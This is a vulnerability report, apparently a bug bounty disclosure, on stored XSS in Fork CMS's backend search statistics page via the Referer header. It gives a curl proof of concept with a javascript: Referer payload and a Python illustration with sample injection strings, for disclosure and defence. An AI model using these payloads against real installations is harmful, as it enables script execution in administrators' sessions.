Cross-site Scripting (XSS) - Stored in forkcms/forkcms

Valid

Reported on

Apr 19th 2021


✍️ Description

Fork CMS records the HTTP Referer header of frontend search requests together with the search statistics and renders the stored value as a clickable link on the backend statistics page. The URL scheme is not restricted, so a Referer set to a javascript: URL is stored and becomes a link that executes JavaScript in the browser of the backend user who clicks it (stored XSS).

🕵️‍♂️ Proof of Concept

Execute the following command against a local instance (the Referer header carries the payload; the search query itself is irrelevant):

curl -H 'Referer: javascript:alert()' 'http://localhost/search?form=search&q_widget=poc&submit=search'

As an authenticated backend user, open http://localhost/private/en/search/statistics.

Click the javascript:alert() link listed as the referrer of the search; the alert fires.

PoC image: https://i.imgur.com/EIMofDE.png
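Why the stored Referer becomes executable, and the check that stops it, as an added illustration that is not Fork CMS's own (PHP) code: the vulnerable renderer below HTML-escapes the value but still uses it as an href, which is enough to reproduce the report, since escaping does nothing to a javascript: scheme; the hardened renderer normalises the value the way browsers do, parses it, and only links absolute http(s) URLs, showing everything else as plain text. The stored referrer values are constructed samples (the first is the PoC payload), and the function names are this example's own.

```python
"""Stored Referer rendered as a link: vulnerable pattern vs. hardened check.

Illustrative code added to the report, not Fork CMS code. Names and the
sample data are assumptions made for this example.
"""
from html import escape
from typing import Optional
from urllib.parse import urlsplit

# Only absolute web URLs may become links on the statistics page.
ALLOWED_SCHEMES = {"http", "https"}

# Constructed sample of referrer strings a statistics table might have
# stored from request Referer headers. First entry is the PoC payload.
STORED_REFERERS = [
    "javascript:alert()",
    "  JavaScript:alert(document.cookie)",          # leading space, mixed case
    "JAVA\tSCRIPT:alert(1)",                        # tab inside scheme
    "data:text/html,<script>alert(1)</script>",     # another non-web scheme
    'http://example.com/?x="><script>alert(1)</script>',  # markup in a real URL
    "https://example.net/page",
    "",
]


def vulnerable_row(referer: str) -> str:
    """Escapes markup but trusts the scheme: javascript:alert() survives intact
    and the resulting <a href="javascript:alert()"> runs when clicked."""
    return f'<a href="{escape(referer, quote=True)}">{escape(referer)}</a>'


def safe_href(referer: str) -> Optional[str]:
    """Return the referrer as a linkable URL, or None if it must not be linked.

    Browsers drop ASCII tab/CR/LF anywhere in a URL and ignore leading and
    trailing C0 controls and spaces, so the value is normalised the same way
    before the decision; a naive startswith("javascript:") check would miss
    "java\\tscript:" and "  JavaScript:". The scheme is then taken from a real
    URL parser (urlsplit lowercases it) and must be http or https with a host.
    """
    cleaned = referer.translate({ord(c): None for c in "\t\r\n"})
    cleaned = cleaned.strip(" " + "".join(chr(i) for i in range(0x20)))
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return None
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return cleaned


def hardened_row(referer: str) -> str:
    """Link only validated http(s) URLs; show anything else as inert text."""
    text = escape(referer) or "(none)"
    url = safe_href(referer)
    if url is None:
        return f"<span>{text}</span>"
    return f'<a href="{escape(url, quote=True)}" rel="noopener noreferrer">{text}</a>'


def render_table(renderer) -> str:
    """Render every stored referrer with the given row renderer."""
    rows = "".join(f"<tr><td>{renderer(r)}</td></tr>" for r in STORED_REFERERS)
    return f"<table>{rows}</table>"


if __name__ == "__main__":
    print("vulnerable:", render_table(vulnerable_row), sep="\n")
    print("hardened:", render_table(hardened_row), sep="\n")
```

The decision is made on the parsed scheme, not on the stored text, and is applied at render time; the same check belongs where the value is first stored, so a later template change cannot reintroduce the link.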

💥 Impact

An unauthenticated attacker can plant the payload with a single unauthenticated search request and then execute arbitrary JavaScript in the session of any authenticated backend user who views the search statistics page and clicks the stored referrer link, with that user's backend privileges.
